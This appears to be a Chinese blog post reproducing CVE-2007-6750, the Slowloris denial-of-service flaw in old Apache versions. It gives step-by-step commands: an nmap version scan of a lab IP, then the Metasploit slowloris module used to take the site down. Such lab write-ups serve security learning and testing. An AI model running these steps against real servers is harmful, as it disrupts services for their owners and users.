CVE-2007-6750 Apache ddos

发布于 2025-03-07 12:46:12 字数 1046 浏览 3 评论 0

一、漏洞简介

Apache HTTP 服务器 1.x 和 2.x 允许远程攻击者通过部分 HTTP 请求导致拒绝服务(守护进程中断),如 Slowloris 所示,这与 2.2.15 之前版本中缺少 mod_ReqTimeout 模块有关

二、漏洞影响

Apache 1.x/2.x

三、复现过程

nmap -sV -p80 192.168.146.175 (用 nmap 查看 Apache 版本)(Apache2.2.3 初步断定存在漏洞)

接着访问网站查看是否正常(发现网站正常)

msfconsole (启动 metasploit)
use auxiliary/dos/http/slowloris (使用模块)
set RHOST 192.168.146.175 (设置目标 IP)
run (执行攻击)

再访问网站查看是否正常(发现网站瘫痪)

四、参考链接

https://www.jsxlo.com/cve-2007-6750/

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据

关于作者

习惯成性

暂无简介

文章
评论
26 人气
更多

推荐作者

櫻之舞

文章 0 评论 0

弥枳

文章 0 评论 0

m2429

文章 0 评论 0

野却迷人

文章 0 评论 0

我怀念的。

文章 0 评论 0

    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文